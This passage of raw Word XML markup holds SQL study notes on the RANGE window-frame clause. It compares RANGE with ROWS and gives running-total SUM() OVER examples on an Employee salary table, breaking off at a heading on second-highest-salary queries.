      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is assumed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D65A8" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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2A0EBE">
          <v:rect id="_x0000_i2951" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A118ECF" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RANGE (Used with WINDOW FUNCTIONS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA07E8E" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E23E1E2"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RANGE is used within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>window function's OVER() clause</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to define a set of rows based on </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>value range</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> around the current row.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D5BD7"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It is often used with ORDER BY in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>analytical functions</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like SUM(), AVG(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD91E8B" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Syntax Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3075B9BA"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SELECT </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F62D888"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    emp_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E19A993"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    salary,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398B7A3E"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    SUM(salary) OVER (ORDER BY salary RANGE BETWEEN UNBOUNDED PRECEDING AND CURRENT ROW) AS running_total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DD7085"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FROM Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832698B" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explanation of the above:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107E16B"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Computes a </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>running total</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565FC39A"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For each row, the window includes all rows with salary </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less than or equal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the current row's salary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DFBCFE" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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2845276">
          <v:rect id="_x0000_i2952" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C623224" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> RANGE vs ROWS (Important Not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11"/>
        <w:gridCol w:w="3737"/>
        <w:gridCol w:w="3086"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2B1B90E5" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E2A6F0F" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CF38670" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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RANGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5579576B" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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ROWS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="23F188C0" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B925FAE"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Based on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="196D82C9"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Column values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="193F1411"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Row position</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="57923021" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0417E68D"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Duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23F45690"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Includes all rows with equal value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FA993A6"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Counts exact number of rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4A0BD2E8" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E4D4053"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14A97DEE"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Running total for values with same salary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4550DBC4"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Running total for N previous rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42A6ECEA" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>➤</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DBB6A9"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Using ROWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFB2937"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UM(salary) OVER (ORDER BY salary ROWS BETWEEN 2 PRECEDING AND CURRENT ROW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2169092F" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5592209F"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Using RANGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FA57B7"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UM(salary) OVER (ORDER BY salary RANGE BETWEEN 1000 PRECEDING AND CURRENT ROW)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03ED28" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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95C3EA1">
          <v:rect id="_x0000_i2953" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE0408" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E" w:rsidP="00393B05">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔚</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">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9"/>
        <w:gridCol w:w="7880"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="69AC2CF1" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37DD5AFB" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41F8323D" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="3776B0FC" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D451124"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ORDER BY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAF41A9"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orts rows by one or more columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="617C7A70" w14:textId="77777777" w:rsidTr="00E6658E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F707D0D"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RANGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="797A3CD4" w14:textId="77777777" w:rsidR="00E6658E" w:rsidRPr="00393B05" w:rsidRDefault="00E6658E"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Defines a </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>window frame</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for window functions based on </w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>value range</w:t>
            </w:r>
            <w:r w:rsidRPr="00393B05">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, not physical rows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="771046F5" w14:textId="17C19885" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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67F2BD6">
          <v:rect id="_x0000_i2954" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76581F84" w14:textId="4CA5B95E" w:rsidR="00191509" w:rsidRPr="00CE4B95" w:rsidRDefault="00191509">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="700" w:name="_Toc196308180"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL </w:t>
      </w:r>
      <w:r w:rsidR="0014246D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidR="0014246D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">econd </w:t>
      </w:r>
      <w:r w:rsidR="00A5453B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">ighest </w:t>
      </w:r>
      <w:r w:rsidR="0014246D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">alary of </w:t>
      </w:r>
      <w:r w:rsidR="0014246D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">mployee from the </w:t>
      </w:r>
